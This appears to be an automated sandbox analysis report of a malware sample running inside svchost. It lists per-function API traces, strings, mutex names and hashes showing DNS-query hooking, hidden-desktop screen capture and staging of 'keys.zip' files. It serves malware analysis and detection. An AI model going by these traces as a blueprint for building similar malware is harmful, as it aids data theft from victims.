ReleaseMutex.KERNEL32(00000000), ref: 02C8D9D9
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8D9F1
CloseHandle.KERNEL32(00000000), ref: 02C8DA03
PathAddBackslashA.SHLWAPI(82c31923), ref: 02C8DA0E
Sleep.KERNEL32(00009C40,82c31923,CRAIF), ref: 02C8DA28

Strings

82c31923, xrefs: 02C8DA09, 02C8DA19
CRAIF, xrefs: 02C8DA14
P0#v, xrefs: 02C8D9D9
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}, xrefs: 02C8D9A0, 02C8D9C4

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
String ID: 82c31923$CRAIF$Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$P0#v
API String ID: 849374196-4133003707
Opcode ID: 7abecb2b965fb5de8c60606add3be0048b7e0247f73bcc70fe952d1209e163ae
Instruction ID: 104e8e4c2d7b88b54f5b5cd2b4d18fb869c1bcacf3b05097bf7c6afeb6e5f25f
Opcode Fuzzy Hash: 7abecb2b965fb5de8c60606add3be0048b7e0247f73bcc70fe952d1209e163ae
Instruction Fuzzy Hash: F401D632EC47547AF312A7B15C0AF5A738CAF44B28F158664F909A31C1DBB499008AA6

Function 02C75940 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53libraryloadernetworkCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02C75940
DnsFlushResolverCache.DNSAPI ref: 02C7594A
LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,75AF7390), ref: 02C7595A
GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02C75973
GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 02C7598F
GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 02C759AB
GetProcAddress.KERNEL32(00000000,Query_Main), ref: 02C759C7

Strings

DnsQuery_W, xrefs: 02C759A5
Query_Main, xrefs: 02C759C1
Dnsapi.dll, xrefs: 02C75955
DnsQuery_A, xrefs: 02C7596D
DnsQuery_UTF8, xrefs: 02C75989

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$AdminCacheFlushLibraryLoadResolverUser
String ID: DnsQuery_A$DnsQuery_UTF8$DnsQuery_W$Dnsapi.dll$Query_Main
API String ID: 2466897691-3547598143
Opcode ID: a2de0311593b83e19bab61a1b851fb9f8a9320d1bfd5ea6f19e30cd09f312231
Instruction ID: 8eefb0f407ac36fa6f6afb46c2e1072f14246f73863aaabdf619568f93586068
Opcode Fuzzy Hash: a2de0311593b83e19bab61a1b851fb9f8a9320d1bfd5ea6f19e30cd09f312231
Instruction Fuzzy Hash: 74018671BC435676B91231751C0AF4B972E4EC0ED5F9206B4FC12F2444DB96E20388B8

Function 02C7B9D0 Relevance: 19.6, APIs: 13, Instructions: 116windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 02C7B9ED
IsWindowVisible.USER32(00000000), ref: 02C7B9FC

Part of subcall function 02C7CC80: GetClassNameA.USER32(?,?,00000101), ref: 02C7CC96

GetWindowRect.USER32(00000000,?), ref: 02C7BA39
GetClassLongA.USER32(00000000,000000E6), ref: 02C7BA42
PrintWindow.USER32(00000000,?,00000000,?,762330D0,?,?,?,02C7843E), ref: 02C7BA55
RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?,?,762330D0,?,?,?,02C7843E), ref: 02C7BA7B
CreateRectRgn.GDI32(?,?,02C7843E,?), ref: 02C7BA91
GetWindowRgn.USER32(00000000,00000000), ref: 02C7BA9B
OffsetRgn.GDI32(00000000,?,?), ref: 02C7BAB5
SelectClipRgn.GDI32(?,00000000), ref: 02C7BAC0
BitBlt.GDI32(?,?,?,02C7843E,?,?,00000000,00000000,00CC0020), ref: 02C7BAE9
SelectClipRgn.GDI32(?,00000000), ref: 02C7BAF2
DeleteObject.GDI32(00000000), ref: 02C7BAF5

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Window$ClassClipRectSelect$CreateDeleteLongNameObjectOffsetPrintRedrawVisible
String ID:
API String ID: 3597830993-0
Opcode ID: 67a26ccbdca2ca42c6637e339f99ddf5f65e0949e96558e05bc8d35b703e6993
Instruction ID: e0fbb222fdb7a689cd4738f8298ab91a3c5c0875cd4c5c97c898b7d6531adc1c
Opcode Fuzzy Hash: 67a26ccbdca2ca42c6637e339f99ddf5f65e0949e96558e05bc8d35b703e6993
Instruction Fuzzy Hash: E4315E71E80114AFD715EBA5DC89FBF7BB8EF89B14F104648FA01A3180DB74AD118A70

Function 02C7CAA0 Relevance: 19.6, APIs: 13, Instructions: 113filesynchronizationmemoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 02C7CAA8
HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAB9

Part of subcall function 02C7C9F0: GetComputerNameA.KERNEL32(02CBD6A8,?), ref: 02C7CA07
Part of subcall function 02C7C9F0: lstrlenA.KERNEL32(02CBD6A8,?,?,02C861D1), ref: 02C7CA12
Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA52
Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA62
Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA72
Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA7F
Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA8C

CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02CBD6C0), ref: 02C7CAE3
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAFC

Part of subcall function 02C780B0: SetThreadDesktop.USER32(?,7622F590,762216B0,00000000), ref: 02C780BF
Part of subcall function 02C780B0: GetDC.USER32(00000000), ref: 02C780C7
Part of subcall function 02C780B0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02C780D8
Part of subcall function 02C780B0: GetDeviceCaps.GDI32(00000000,00000008), ref: 02C780E9
Part of subcall function 02C780B0: CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02C78100
Part of subcall function 02C780B0: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02C78142
Part of subcall function 02C780B0: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02C78152
Part of subcall function 02C780B0: DeleteObject.GDI32(00000000), ref: 02C78155
Part of subcall function 02C780B0: ReleaseDC.USER32(00000000,00000000), ref: 02C7815E
Part of subcall function 02C780B0: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C781B9

CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CBD66C), ref: 02C7CB29
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB3C
CreateMutexA.KERNEL32(00000000,00000000,02CBD790,?,?,02C77262,00000000,00000000), ref: 02C7CB5A
CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB6B
CreateMutexA.KERNEL32(00000000,00000000,02CBD750,?,?,02C77262,00000000,00000000), ref: 02C7CB7F
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB98
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBAB
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBBE
CreateEventA.KERNEL32(00000000,00000000,00000000,02CBD6FC,?,?,02C77262,00000000,00000000), ref: 02C7CBD4

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Create$wsprintf$EventFile$Mutex$BitsCapsDeviceHeapMappingView$BitmapCompatibleComputerCountDeleteDesktopFreeNameObjectReleaseThreadTicklstrlen
String ID:
API String ID: 2940656088-0
Opcode ID: a3c7da03c06e7baacfa3e58cff91971bdf7a1da4547cc210a681c6769fa2a69e
Instruction ID: 7143cfbcd07b478516294d572ce1f76d00f89f23f1645128c4751ac3e455c077
Opcode Fuzzy Hash: a3c7da03c06e7baacfa3e58cff91971bdf7a1da4547cc210a681c6769fa2a69e
Instruction Fuzzy Hash: 37315870FC47067AFA625B799C43F552A98AB84F11F240A67B705FE1C1DAE0E2108A69

Function 02C8F870 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 139COMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(82C31B07,?,7693BF00), ref: 02C8F8A0
CreateDirectoryA.KERNEL32(?,00000000,?,7693BF00), ref: 02C8F8E1
GetLastError.KERNEL32(?,7693BF00), ref: 02C8F8EB
IsUserAnAdmin.SHELL32 ref: 02C8F8F3
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F904
SetLastError.KERNEL32(00000000,?,7693BF00), ref: 02C8F90B
SetCurrentDirectoryA.KERNEL32(?,?,7693BF00), ref: 02C8F918
PathAddBackslashA.SHLWAPI(82C31B07,?,?,?,7693BF00), ref: 02C8F987

Strings

keys.zip, xrefs: 02C8F938
path1.txt, xrefs: 02C8F9C8
82C31B07, xrefs: 02C8F89B, 02C8F8A2, 02C8F982, 02C8F989

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
String ID: 82C31B07$keys.zip$path1.txt
API String ID: 1373881290-90640282
Opcode ID: 995880c70c9912810f1758e375a2811a9e2a576be5440f13094ddfdcdb918970
Instruction ID: 29d7d588c098d824c285a5ef575a4294df5b1a72b2e407bb19de8d166829a7dc
Opcode Fuzzy Hash: 995880c70c9912810f1758e375a2811a9e2a576be5440f13094ddfdcdb918970
Instruction Fuzzy Hash: 3E415B315002455FCB16DF2498A87E7BBE9EF85304F54C5E8D9C9C7600EB70DA49C790

Function 02C92180 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(82C31D7D), ref: 02C921B0
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C921F1
GetLastError.KERNEL32 ref: 02C921FB
IsUserAnAdmin.SHELL32 ref: 02C92203
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92214
SetLastError.KERNEL32(00000000), ref: 02C9221B
SetCurrentDirectoryA.KERNEL32(?), ref: 02C92228
PathAddBackslashA.SHLWAPI(82C31D7D,?,02C923DC), ref: 02C92297

Strings

keys.zip, xrefs: 02C9225D
path1.txt, xrefs: 02C922D8
82C31D7D, xrefs: 02C921AB, 02C921B2, 02C92292, 02C92299

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
String ID: 82C31D7D$keys.zip$path1.txt
API String ID: 1373881290-2115683760
Opcode ID: bad6e884dcd6c20827d84814306d4c4b625bec54e46aebd30b1b17291ffe3891
Instruction ID: af73b95f3afc7f7d0884e6785d3ddf53a614609f7025e591714c5bd7d1cea629
Opcode Fuzzy Hash: bad6e884dcd6c20827d84814306d4c4b625bec54e46aebd30b1b17291ffe3891
Instruction Fuzzy Hash: 7D4114719046455FCF168B24AC9CBEABBE9EF85300F148694EDC9C7201EB71CA58CB91

Function 02C7A8A0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81synchronizationwindowthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A8C3
ReleaseMutex.KERNEL32(00000000), ref: 02C7A8F0
IsWindow.USER32(?), ref: 02C7A8F7
SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7A909
GetCurrentThreadId.KERNEL32 ref: 02C7A918
GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7A922
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A934
ReleaseMutex.KERNEL32(00000000), ref: 02C7A961
IsWindow.USER32(?), ref: 02C7A968
SendMessageA.USER32(?,00000215,00000000,?), ref: 02C7A97B

Strings

P0#v, xrefs: 02C7A8F0, 02C7A961

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Window$MessageMutexObjectReleaseSendSingleThreadWait$CurrentProcess
String ID: P0#v
API String ID: 2596333622-3387790918
Opcode ID: 6732ab873021143345105f0ae7f6a40ba091e59bea1e656974525272d65fe9d3
Instruction ID: 11d871deff8ae8ac6c3bb86cc3c047be6394bae5bf7a145b80572d6ccf4b0d3c
Opcode Fuzzy Hash: 6732ab873021143345105f0ae7f6a40ba091e59bea1e656974525272d65fe9d3
Instruction Fuzzy Hash: 4621E231A80210AFC7028B65E84CFABBBA8FFD8721F054BB6F118C7251CB705561CBA0

Function 02C8A300 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 41sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02C8A32C
ReleaseMutex.KERNEL32(00000000), ref: 02C8A335
GetHandleInformation.KERNEL32(00000000,?), ref: 02C8A349
CloseHandle.KERNEL32(00000000), ref: 02C8A35B
PathAddBackslashA.SHLWAPI(82c3181f), ref: 02C8A366
Sleep.KERNEL32(00009C40,82c3181f,ALPHA), ref: 02C8A380
Sleep.KERNEL32(00000064), ref: 02C8A386

Strings

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}, xrefs: 02C8A320
82c3181f, xrefs: 02C8A361, 02C8A371
ALPHA, xrefs: 02C8A36C
P0#v, xrefs: 02C8A335

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
String ID: 82c3181f$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0#v
API String ID: 4280258085-3298862243
Opcode ID: 80761793af32adadccc08d11091c2edfdfc4dc98b57416fe8d9733845e4c6d5b
Instruction ID: 66065183afabc5e205905a98ee6f42eaf75174fc29e32019c41c5dc9de667fcd
Opcode Fuzzy Hash: 80761793af32adadccc08d11091c2edfdfc4dc98b57416fe8d9733845e4c6d5b
Instruction Fuzzy Hash: 47F0C8319C478076E30377619C0EF5A779CBF49B19F048619F55AA3181DBB4E9048B7B

Function 02C918D0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 41sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C918FC
ReleaseMutex.KERNEL32(00000000), ref: 02C91905
GetHandleInformation.KERNEL32(00000000,?), ref: 02C91919
CloseHandle.KERNEL32(00000000), ref: 02C9192B
PathAddBackslashA.SHLWAPI(82C31CB5), ref: 02C91936
Sleep.KERNEL32(00009C40,82C31CB5,RFK), ref: 02C91950
Sleep.KERNEL32(00000064), ref: 02C91956

Strings

RFK, xrefs: 02C9193C
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02C918F0
P0#v, xrefs: 02C91905
82C31CB5, xrefs: 02C91931, 02C91941

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
String ID: 82C31CB5$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0#v$RFK
API String ID: 4280258085-134197944
Opcode ID: 50ff971ec6fb5c5cafd525f8d5ef67f4af66823a64cf0cd0a346fc3ec5b13101
Instruction ID: 141189960a55e461df8e06af9ff8a9f56ae7c7247c1961c10fdf04627f25ceb8
Opcode Fuzzy Hash: 50ff971ec6fb5c5cafd525f8d5ef67f4af66823a64cf0cd0a346fc3ec5b13101
Instruction Fuzzy Hash: 1EF0F9309C47827AE60257614C1FF1A37DD6F44B59F094664F51663180DBF0951086AA

Function 02C8E890 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 41sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C8E8BC
ReleaseMutex.KERNEL32(00000000), ref: 02C8E8C5
GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E8D9
CloseHandle.KERNEL32(00000000), ref: 02C8E8EB
PathAddBackslashA.SHLWAPI(82c319a5), ref: 02C8E8F6
Sleep.KERNEL32(00009C40,82c319a5,HANDY), ref: 02C8E910
Sleep.KERNEL32(00000064), ref: 02C8E916

Strings

HANDY, xrefs: 02C8E8FC
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02C8E8B0
82c319a5, xrefs: 02C8E8F1, 02C8E901
P0#v, xrefs: 02C8E8C5

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
String ID: 82c319a5$HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0#v
API String ID: 4280258085-4110396391
Opcode ID: bbf26cff921429fc15a84b544844029a10b92a237402795641b3290510035523
Instruction ID: 6cb507c3f8e8aa611efe161f5ac436fe0354e7091d39b52a75f674d21e25321d
Opcode Fuzzy Hash: bbf26cff921429fc15a84b544844029a10b92a237402795641b3290510035523
Instruction Fuzzy Hash: 8FF0D1309C4741BAF21277658C0AF1E369C6F85B18F048664F905A2082DBB4A5108AAB

Function 02C80A70 Relevance: 17.9, APIs: 14, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b8308effba2e0fad6e10e14667dd85b0e6b556642bc1ce5fb5bbcfcda7619dd
Instruction ID: e9425d0ca37bfb561863d8c25653af8c558fe77ebd5fc73c7aa99de3bacac200
Opcode Fuzzy Hash: 4b8308effba2e0fad6e10e14667dd85b0e6b556642bc1ce5fb5bbcfcda7619dd
Instruction Fuzzy Hash: 42C1D631A006169FCB15DF68C8A4BBE7BB5EF85318F14C294ED569B340E731AA0DCB90

Function 02C7B390 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120synchronizationCOMMON

Download Yara Rule

APIs

WindowFromDC.USER32(?), ref: 02C7B39C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7B3D4
CreateRectRgn.GDI32(00000001,00000001,00000001,00000001), ref: 02C7B3E2
GetClipRgn.GDI32(?,00000000), ref: 02C7B3EC
SelectClipRgn.GDI32(00000000,00000000), ref: 02C7B3FC
DeleteObject.GDI32(00000000), ref: 02C7B403
GetViewportOrgEx.GDI32(?,?), ref: 02C7B40E
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 02C7B422
ReleaseMutex.KERNEL32(00000000), ref: 02C7B463

Strings

P0#v, xrefs: 02C7B463

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
String ID: P0#v
API String ID: 3315380975-3387790918
Opcode ID: cb569ef6b664245f7c3fa50cf9dcfabde7d68aeb19ca8df509e47a00b2190c6b
Instruction ID: fa693be15dccf9b0968d71d7f8b39fe227df8554a4e78187f550de969f190dc2
Opcode Fuzzy Hash: cb569ef6b664245f7c3fa50cf9dcfabde7d68aeb19ca8df509e47a00b2190c6b
Instruction Fuzzy Hash: 5941E7B6640245ABCB14CF99DC84EAB77BDEF8C715F108A59FA19D3240D630EC51CBA0

Function 02C928B8 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 118synchronizationsleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(82c31cf4), ref: 02C928D7
PathAddBackslashA.SHLWAPI(82c31cf4,?,?), ref: 02C92969
CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},?,?), ref: 02C929F5
Sleep.KERNEL32(000003E8), ref: 02C92A06
ReleaseMutex.KERNEL32(00000000), ref: 02C92A0D

Part of subcall function 02C93E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C93E14
Part of subcall function 02C93E00: CloseHandle.KERNEL32(?), ref: 02C93E25

Strings

keys.zip, xrefs: 02C9291B
path.txt, xrefs: 02C929AD
82c31cf4, xrefs: 02C928D2, 02C928DD, 02C92964, 02C9296F
P0#v, xrefs: 02C92A0D
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}, xrefs: 02C929EC

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: BackslashHandleMutexPath$CloseCreateInformationReleaseSleep
String ID: 82c31cf4$Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0#v$keys.zip$path.txt
API String ID: 3621236684-1746767206
Opcode ID: 6662977885a8421e18f6af644ab4a01a33225e6860766ebb42bd12c63e0eec3a
Instruction ID: 68b0bd38cb0a6921277f2db676b60a575a159409839778f83137e24ce36cf823
Opcode Fuzzy Hash: 6662977885a8421e18f6af644ab4a01a33225e6860766ebb42bd12c63e0eec3a
Instruction Fuzzy Hash: 1A41E8319445DA5FDB17CB28982C7E6BBE5AF89300F1886D9DCC9DB201DB718A48C791

Function 02C93840 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68memorylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E

RtlImageNtHeader.NTDLL(00000000), ref: 02C9386E
GetTickCount.KERNEL32 ref: 02C93882
GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02C84480), ref: 02C93893
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02C938A3
GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C84480), ref: 02C938E0
HeapValidate.KERNEL32(00000000,?,?,02C84480), ref: 02C938E3
GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C84480), ref: 02C938F0
HeapFree.KERNEL32(00000000,?,?,02C84480), ref: 02C938F3

Strings

ntdll.dll, xrefs: 02C9388E
RtlUniform, xrefs: 02C9389D

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FileHandle$FreeValidate$AddressAllocateCloseCountCreateHeaderImageInformationModuleProcReadSizeTickWritememset
String ID: RtlUniform$ntdll.dll
API String ID: 1403775172-3277137149
Opcode ID: 0f724954e1104db53d25ed058d3cccfce3948f48a115a77b501287c6e6e1cb74
